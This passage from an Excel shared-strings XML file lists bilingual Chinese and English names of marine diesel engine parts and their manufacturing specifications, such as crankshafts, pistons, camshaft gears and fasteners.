    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>FTPA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Material-and quality specification: Forged steel cylinder cover</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>首制件认可：锻造缸盖材料规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>O</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型圈材料规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力测试规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性螺栓首制件认可</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆填料函</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴材料规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴首制件认可</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>首制件认可：锻造曲柄材料规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Machining specification for semi built crankshafts</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴加工图</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Presetving instruction for crankshaft</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴防护规范</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试装置说明</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴附属件</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮制造规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>聚四氟乙烯材料规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTFE</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫圈</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>Hexagon head bolt</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>M16×60</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞头订货图</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Material-and test specification: piston head</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞头材料及测试规范</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Non destructive testing (NDT) specification</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Quality and test specification for chromium-plating of piston ring grooves</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环槽质量测试规范</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Welding geometry</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接尺寸公差</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Manucfacturing and quality instruction for piping systems</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管路制造要求及质量规范</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆材料及测试规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Quality and test instructions for piston rings (GGV)</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环质量测试规范</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Inspection instructions for piston rings</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环检验规范</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <t>Quality and test instructions for piston rings (GG"spec".</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>Ⅲ</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Connecting rod and assembly parts</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆装配件</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Material and test specification : connecting rod</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆材料及测试规范</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Material and test specification : Thick plates and lower bearing half</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后壁轴瓦材料及测试规范</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Annealing instruction for components made of with white metal lining</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金件退火规范</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Material and test specofocation : white metal lining</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金材料及测试规范</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Material and testing specification for first time production approval : Bearings</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承首制件认可</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞冷却油</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头滑油</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>Taper pin</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>6×30</t>
    </r>
  </si>
  <si>
    <r>
      <t>Dowel pin</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>6×14</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定位销</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>Steel wire</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>D1.5×1000</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢丝</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头销</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导块</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸钢部件规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导轨</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸钢部件首制件认可</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金衬套制造规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金材料及测试规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头销规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>销表面检验规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头防护规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头销材料及测试规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Specification for case hardening of steel parts</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢制部件硬化</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Gas nitriding specification</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>氮化规范</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Hopper (lower)</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>漏斗</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>C60×30×30×2.3-155.7L</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>C60×30×30×2.3-354.6L</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>C60×30×30×2.3-104.7L</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>C60×30×30×2.3-62L</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Hopper (upper)</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>C60×30×30×2.3-270L</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Conduit</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管道</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>C125×65×6×8-700L</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>C125×65×6×8-90L</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Rubber plate (B)</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶板</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Rubber plate (A)</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Hexagon head bolt M12×40</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Hexagon head bolt M12×20</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Hexagon head screw M10×140</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Countersink head screw M4×0.7×10</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>沉头螺栓</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Double tongued washer M10</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双舌垫圈</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Plug M24×2</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>塞子</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Copper </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>ｇ</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>asket</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>24×34×</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>ｔ</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1.0</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铜垫片</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>L40×40×t5-220L</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Hexagon head screw M12×20</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Pan head screw M4×0.7×8</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘头螺钉</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助风机</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管路制造要求及质量规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单向阀</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>卡环</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Camshaft driving gear assembly</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴驱动机构装配</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴齿轮</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴齿轮粗加工</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Material specification for camshaft driving gears</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴驱动机构材料规范</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴齿轮</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴齿轮粗加工</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴轴毂</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间齿轮</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间轴齿轮粗加工</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴驱动机构衬套</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间齿轮轴</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间齿轮轴支架</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>Gear cover (1/3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3/3)</t>
    </r>
  </si>
  <si>
    <t>Flat bar 25×3×320</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扁钢</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>10.9-Bolt M16 X 55</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁板</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管支架</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双舌垫圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹锥销</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Locking wire φ2.0</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁定铁丝</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Locking wire φ1.6</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压油缸</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流孔</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥状弹簧垫圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀杆</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <t>O</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型圈</t>
